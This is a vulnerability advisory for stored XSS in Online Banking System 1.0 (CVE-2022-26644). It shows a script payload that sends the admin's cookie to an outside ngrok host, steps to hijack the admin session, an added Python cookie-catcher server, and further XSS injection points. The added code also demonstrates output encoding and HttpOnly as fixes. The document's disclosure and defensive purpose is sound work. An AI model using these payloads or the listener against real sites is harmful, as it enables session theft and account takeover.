Title: Online Banking System Stored XSS

Author: (Erik451)

CVE: CVE-2022-26644

Vendor Homepage: https://www.sourcecodester.com/

Software Link: Online Banking System

Version: OBS 1.0

Description: A stored XSS issue in OBS v1.0 allows remote attackers to inject JavaScript through the description parameters. The XSS can be chained into privilege escalation:

  • A client can craft a malicious payload; when the administrator opens the "account management" menu, the payload executes in the administrator's browser and the administrator's cookies are sent to the attacker's server.

Steps to reproduce:

Client Session

Payload used to steal the session Cookie:

<script>var i=new Image;i.src=`https://2c32-81-9-194-204.ngrok.io/?c=${document.cookie}`;</script>

[screenshot: ngrokclient]

Admin Session

The administrator opens the manage accounts menu and the payload executes in the background. The admin cookie now arrives in the request to our listener:

[screenshot: admincookie]

Client Session

Replace our session cookie with the captured admin cookie, reload the admin page, and we are now administrator.

[screenshot: loginasadmin]
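The chain above, modelled as an added example that is not part of this advisory or of the OBS code base. It assumes (as an assumption, not something the report shows) that OBS renders the stored "description" field into the admin page by plain string concatenation, and it replaces the ngrok endpoint with a local listener so the flow runs offline: the vulnerable rendering beside the output-encoded fix, the parsing a cookie catcher does on the beacon request, and the HttpOnly check that would have kept `document.cookie` from exposing the session.

```python
"""Added example (not part of the advisory or of the OBS code base): models the
stored-XSS -> cookie-theft chain from the report and the output-encoding fix.

Assumptions, labelled as such: OBS is a PHP application that concatenates the
stored 'description' field straight into the admin's account-management page;
the attacker's ngrok URL is stood in for by a local listener (LISTENER).
"""
import html
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Same beacon payload as the advisory: an Image object whose src carries
# document.cookie to the attacker's listener. LISTENER is a placeholder.
LISTENER = "http://127.0.0.1:8080"
PAYLOAD = ("<script>var i=new Image;"
           f"i.src=`{LISTENER}/?c=${{document.cookie}}`;</script>")


def render_description_vulnerable(description: str) -> str:
    """Models the vulnerable page (assumed behaviour): the stored field is
    concatenated raw into HTML, so a <script> tag stored by a client runs
    in whichever admin opens the account-management page."""
    return f"<td>{description}</td>"


def render_description_fixed(description: str) -> str:
    """Output-encoded rendering. The PHP equivalent is
    htmlspecialchars($description, ENT_QUOTES, 'UTF-8'): '<', '>', '&' and
    quotes become entities, so the browser shows the payload as inert text."""
    return f"<td>{html.escape(description, quote=True)}</td>"


def extract_stolen_cookie(request_target: str) -> Optional[str]:
    """Parse the request the beacon makes, e.g. '/?c=PHPSESSID=abc123', and
    return the cookie string an attacker would paste into their own browser.
    parse_qs splits each pair on the first '=', so the cookie's own '=' survives."""
    values = parse_qs(urlparse(request_target).query).get("c")
    return values[0] if values else None


def cookie_is_httponly(set_cookie_header: str) -> bool:
    """True if the Set-Cookie header carries HttpOnly. With that attribute the
    payload above still runs, but document.cookie no longer contains the
    session id, so the replay step fails."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "httponly" in attrs


class CookieCatcher(BaseHTTPRequestHandler):
    """Minimal stand-in for the ngrok-tunnelled listener in the advisory."""

    def do_GET(self) -> None:
        cookie = extract_stolen_cookie(self.path)
        if cookie:
            print(f"[+] cookie from {self.client_address[0]}: {cookie}")
        # The Image object ignores the body; any 200 response will do.
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()

    def log_message(self, *_args) -> None:  # keep stdout for captured cookies
        pass


if __name__ == "__main__":
    print(render_description_vulnerable(PAYLOAD))  # <script> tag intact
    print(render_description_fixed(PAYLOAD))       # &lt;script&gt;... inert
    HTTPServer(("127.0.0.1", 8080), CookieCatcher).serve_forever()
```

Running the file prints both renderings and then listens on 127.0.0.1:8080; pointing the payload's URL at that listener instead of ngrok reproduces the capture step locally. Encoding on output is the fix for every injection point listed in this report, since each one is the same pattern: attacker-controlled text written into a page that another user's browser renders.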


Other XSS

Payload used: <img src="x" onerror=prompt(1)>

Announcements Title

[screenshot: XSSannouncement]

[screenshot: XSSannouncement2]

Accounts Name

System Info Name

  • 1- Go to http://web.com/admin/?page=system_info
  • 2- Edit the app/system info and paste the payload
  • 3- This is the application's configuration: every client sees the title in the app, so the XSS executes for all of them.

[screenshot: XSSsysinfo]